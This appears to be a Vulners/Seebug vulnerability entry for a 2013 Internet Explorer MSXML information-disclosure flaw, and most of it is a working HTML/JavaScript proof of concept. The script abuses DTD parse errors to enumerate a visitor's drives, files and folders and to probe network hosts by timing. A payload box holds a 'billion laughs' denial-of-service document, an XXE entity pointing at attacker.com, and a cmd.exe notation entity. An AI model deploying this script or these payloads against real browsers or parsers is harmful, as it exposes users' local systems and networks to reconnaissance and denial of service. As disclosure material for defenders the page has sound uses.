Lucene search
K

Microsoft Internet Explorer 'MSXML'错误文件枚举漏洞

🗓️ 07 May 2013 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Microsoft Internet Explorer 'MSXML' Enumeration Vulnerabilit

Code

                                                Soroush Dalili ([email protected])提供了如下测试方法,请参考下面的链接:

http://0me.me/demo/IE/dtdTest.html

---------

<html>
<head>
<script>
// Coded by Soroush Dalili - @irsdl - secproject.com
var templateString = '<?xml version="1.0" ?><\!DOCTYPE anything SYSTEM "$target$">';
var _debug = false;
origAlert = window.alert;
if(!_debug) window.alert = function(){return}

var RESULTS = {
  UNKNOWN : {value: 0, message: "Unknown!", color: "black", data: ""}, 
  BADBROWSER: {value: 1, message: "Browser is not supported. You need IE!", color: "black", data: ""}, 
  FILEFOUND : {value: 2, message: "File was found!", color: "green", data: ""},
  FOLDERFOUND : {value: 3, message: "Folder was found!", color: "green", data: ""},
  NOTFOUND : {value: 4, message: "Object was not found!", color: "red", data: ""},
  ALIVE : {value: 5, message: "Alive address!", color: "green", data: ""},
  MAYBEALIVE : {value: 6, message: "Maybe an alive address!", color: "blue", data: ""},
  DEAD : {value: 7, message: "Dead to me! Undetectable?", color: "red", data: ""},
  VALIDDRIVE : {value: 8, message: "Available Drive!", color: "green", data: ""},
  INVALIDDRIVE : {value: 9, message: "Unavailable Drive!", color: "red", data: ""}
};

function checkDrives(objOutputDiv) {
    var drives = "abcdefghijklmnopqrstuvwxyz".split("");
    objOutputDiv.innerHTML = '';
    for (var item in drives) {
        var drivename = drives[item].toUpperCase() + ":\\"
        var result = validateXML(templateString.replace("$target$", drivename));
        if (result == RESULTS.FOLDERFOUND) {
            result = RESULTS.VALIDDRIVE;
            result.data = drivename;
            updateDiv(result, objOutputDiv);
        }else{
			result = RESULTS.INVALIDDRIVE;
			result.data = drivename;
			//updateDiv(result, objOutputDiv); // We ignore invalid drives!
		}
    }

}

function checkDrive(drive) {
	var drivename = drive.toUpperCase() + ":\\"
	var result = validateXML(templateString.replace("$target$", drivename));
	if (result == RESULTS.FOLDERFOUND) {
		return true;
	}else{
		return false;
	}
}



function checkFiles(strInput, objOutputDiv) {
    var files = strInput.split("\n");
    var preMagics = ["res://","\\\\localhost\\", "file:\\\\localhost\\", "file:\\"]; // the first one is for all drives, the others are for the C drive only!
    var postMagics = ["::$index_allocation"]; // or any other irrelevant ADS! - we do not need this when we use Res://

    objOutputDiv.innerHTML = '';
    for (var item in files) {
        var filename = files[item].fulltrim();
        // filename = filename.replace(/^c:\\/ig, ''); // We only need this if use C drive specific vectors
        if (filename != '') {
            filename = preMagics[0] + filename; // postMagics can be used too!
            var result = validateXML(templateString.replace("$target$", filename));
            if (result == RESULTS.FOLDERFOUND || result == RESULTS.ALIVE) result = RESULTS.UNKNOWN;
            result.data = filename;
            updateDiv(result, objOutputDiv);
        }
    }

}

function checkFolders(strInput, objOutputDiv) {
    var folders = strInput.split("\n");
    var preMagics = ["res://", "\\\\localhost\\", "file:\\\\localhost\\", "file:\\"]; // the first one is for all drives, the others are for the C drive only!
    var postMagics = ["::$data"]; // or any other irrelevant ADS! - we do not need this when we use Res://
    objOutputDiv.innerHTML = '';
    for (var item in folders) {
        var foldername = folders[item].fulltrim();
        // foldername = foldername.replace(/^c:\\/ig, ''); // We only need this if use C drive specific vectors
        if (foldername != '') {
            var result = RESULTS.UNKNOWN;
            if (foldername.substring(1,2) != ':' || checkDrive(foldername.substring(0,1))){
				foldername = preMagics[0] + foldername // + postMagics[0]; // We only need this if use C drive specific vectors
				var result = validateXML(templateString.replace("$target$", foldername));

				if (result == RESULTS.FILEFOUND || result == RESULTS.ALIVE) result = RESULTS.UNKNOWN;
			}else{
				result = RESULTS.INVALIDDRIVE;
			}
            result.data = foldername;
            updateDiv(result, objOutputDiv);
        }
    }
}

function checkAddress(strInput, objOutputDiv, isNetwork) {
    var addr = strInput.fulltrim();
    objOutputDiv.innerHTML = '';
    if (addr != '') {
        var result = RESULTS.UNKNOWN;

        if (isNetwork) {
            addr = "\\\\" + addr + "\\c$";
        } else {
            addr = "http://" + addr;
        }
        alert(addr);

        // time is gold! let's misuse it!

        var start = (new Date).getTime();
        var result = validateXML(templateString.replace("$target$", addr));
        var diff = (new Date).getTime() - start;
        alert(diff);
        if (result != RESULTS.BADBROWSER) {
            if (!isNetwork) {
                if (diff < 10000) { // 10 seconds just for now! it wont work for a slow network/server as this is not dynamic at the moment!
                    if (result == RESULTS.UNKNOWN || result == RESULTS.NOTFOUND) result = RESULTS.MAYBEALIVE; // ouuch! so accurate! :P
                    else result = RESULTS.ALIVE;
                } else {
                    result = RESULTS.DEAD;
                }
            } else {
                if (result == RESULTS.UNKNOWN || result == RESULTS.NOTFOUND) result = RESULTS.DEAD;
                else result = RESULTS.ALIVE;
            };
        };
        result.data = addr;
        updateDiv(result, objOutputDiv);
    }
}

function updateDiv(objResult, objOutputDiv) {
    objOutputDiv.innerHTML += "<p>" + objResult.data.escapeHTML() + " ><font color='" + objResult.color.escapeHTML() + "'><b>  " + objResult.message.escapeHTML() + "</b></font></p>";
};

if (typeof String.prototype.endsWith !== 'function') {
    String.prototype.endsWith = function (suffix) {
        return this.indexOf(suffix, this.length - suffix.length) !== -1;
    };
};

if (typeof String.prototype.fulltrim !== 'function') {
    String.prototype.fulltrim = function () {
        return this.replace(/(?:(?:^|\n)\s+|\s+(?:$|\n))/g, '').replace(/\s+/g, ' ');
    };
};

if (typeof String.prototype.escapeHTML !== 'function') {
    String.prototype.escapeHTML = function () {
        var div = document.createElement('div');
        var text = document.createTextNode(this);
        div.appendChild(text);
        return div.innerHTML;

    };
};


//var testloadXML;

function validateXML(txt, _isDebugMode) {
    var result = RESULTS.UNKNOWN;
	
	
    var temp = window.alert;
    if (_isDebugMode) {
        window.alert = origAlert;
    }
    // code for IE
    if (window.ActiveXObject) {
        var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
        xmlDoc.async = true;
        try {
            xmlDoc.loadXML(txt);
			if (xmlDoc.parseError.errorCode != 0) {
				var err;
				err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
				err += "Error Reason: " + xmlDoc.parseError.reason;
				err += "Error Line: " + xmlDoc.parseError.line;
				alert(err);

				var errReason = xmlDoc.parseError.reason.toLowerCase();
				alert(errReason);
				if (errReason.search('access is denied') >= 0)  {
					result = RESULTS.ALIVE;
				} else if(errReason.search('the system cannot locate the object') >= 0 || errReason.search('the system cannot find the file') >= 0 || errReason.search('the network path was not found') >= 0) {
					result = RESULTS.NOTFOUND;
				} else if(errReason!=''){
					result = RESULTS.FILEFOUND;
				}else{
					result = RESULTS.UNKNOWN; // No Error? Unknown!
				};
			} else {
				result = RESULTS.FILEFOUND;
			}
        } catch (e) {
            alert('Catch section: '+e.message);
            result = RESULTS.FOLDERFOUND;
        }
		
        
    } else {
        result = RESULTS.BADBROWSER;
    }
	result.data = "";
	alert(result.message);
	
    window.alert = temp;
    return result;
}


</script>

<style>
div.result{
	overflow-y:scroll;width:500px;height:200px;border-width:1px;border-style:dotted;
}
</style>
</head>
<body>
<pre>
PoC: Microsoft XMLDOM in IE can divulge information of local drive/network in error messages
Author: Soroush Dalili - @irsdl
Reference: SecProject.com
Date: 25/04/2013
</pre>
<br/>
<table>
	<tr>
		<td>
			Scan for available drives!
		</td>
		<td>
			<input type="button" value="1- Find All Drive Names" onclick="checkDrives(document.getElementById('driveresult'))" />
		</td>
		<td>
			<div id="driveresult" class="result"></div>
		</td>
	</tr>
	<tr>
		<td>
<textarea id="filecheck" style="width:400px;height:200px;">
c:\windows\system32\calc.exe
c:\windows\system32\invalidIRSDL_File.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\OutlookChangeNotifierAddIn.dll
C:\Program Files\Java\jre7\bin\java.exe
d:\validfile.txt
d:\invalidfile.txt
</textarea>
<!--
\\localhost\windows\system32\calc.exe
file:\\localhost\windows\system32\calc.exe
file:\windows\system32\calc.exe
\\localhost\windows\system32\calc.exe::$index_allocation
\\localhost\windows\system32\invalidfileIRSDL.exe
file:///c:\windows\system32\calc.exe
\\127.0.0.1\c$\windows\system32\calc.exe
\\localhost\winnt\system32\calc.exe
-->
		</td>
		<td>
			<input type="button" value="2- Check These Files in C Drive" onclick="checkFiles(document.getElementById('filecheck').value,document.getElementById('fileresult'))" />
		</td>
		<td>
			<div id="fileresult" class="result"></div>
		</td>
	</tr>
	<tr>
		<td>
<textarea id="foldercheck" style="width:400px;height:200px;">
c:\program files
c:\invalidIRSDL_Folder
c:\Users
C:\Program Files\Java\jdk1.7.0_17\bin
d:\temp
d:\invalidFolder
</textarea>
<!--
\\localhost\program files::$data
file:\\localhost\program files::$data
file:\program files::$data
\\localhost\invalid folder IRSDL::$data
\\localhost\program files\
file:///c:\program files\
\\127.0.0.1\c$\program files\
-->
		</td>
		<td>
			<input type="button" value="3- Check These Folders in C Drive" onclick="checkFolders(document.getElementById('foldercheck').value,document.getElementById('folderresult'))" />
		</td>
		<td>
			<div id="folderresult" class="result"></div>
		</td>
	</tr>	
	<tr>
		<td>
<input type="text" id="addresscheck" style="width:400px;" value="127.0.0.1">
<br/>
Windows Network Address <input type="radio" id="networkAddress" name="networkOrHTTP" value="1" checked="checked">
HTTP <input type="radio" id="httpAddress" name="networkOrHTTP" value="2">
		</td>
		<td>
			<input type="button" value="4- Check These Addresses" onclick="if(confirm('It may take time. Do you want to continue?'))checkAddress(document.getElementById('addresscheck').value,document.getElementById('addressresult'),document.getElementById('networkAddress').checked);" />
		</td>
		<td>
			<div id="addressresult" class="result"></div>
		</td>
	</tr>
	<tr>
		<td>
<textarea id="validxml2" style="width:400px;height:400px;">
<!-- Test0 - Denial of Service! -->
<?xml version="1.0"?>
<!-- example from http://msdn.microsoft.com/en-us/magazine/ee335713.aspx -->

<!DOCTYPE lolz [
 <!ELEMENT lolz ANY>
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Test1 -->
<!--
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE anything SYSTEM "\\localhost\windows\system32\calc.exe">
<request action="xxxx"></request>
-->

<!-- Test2 -->
<!--
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE request [
  <!ELEMENT request EMPTY>
  <!ATTLIST request action CDATA #REQUIRED callback ENTITY #REQUIRED>
  <!ENTITY test SYSTEM "calc.exe" NDATA EXE>
  <!NOTATION EXE SYSTEM "cmd.exe /c">
]>
<request action="xxxx" callback="test" />
-->

<!-- Test3 -->
<!--
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
-->

<!-- Test4 - you need the xml file with xxe! -->
<!--
<!DOCTYPE doc [
<!ELEMENT doc ANY>
<!ENTITY % iso-lat1 PUBLIC "ISO 8879:1986//ENTITIES Added Latin 1//EN//XML"
                    "http://example.com/test.xml">

%iso-lat1;


]>
<doc>
This document declares the ISO Latin 1 Character Entity Set, providing
access to the ISO Latin 1 entities, such as "&xxe;" and 
</doc>
-->

</textarea>
		</td>
		<td>
			<input type="button" value="Validate DTD (IE Only!)" onclick="updateDiv(validateXML(document.getElementById('validxml2').value,true), document.getElementById('testresult'));" />
		</td>
		<td>
			<div id="testresult" class="result"></div>
		</td>
	</tr>
</table>
</body>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 May 2013 00:00Current
6.9Medium risk
Vulners AI Score6.9
25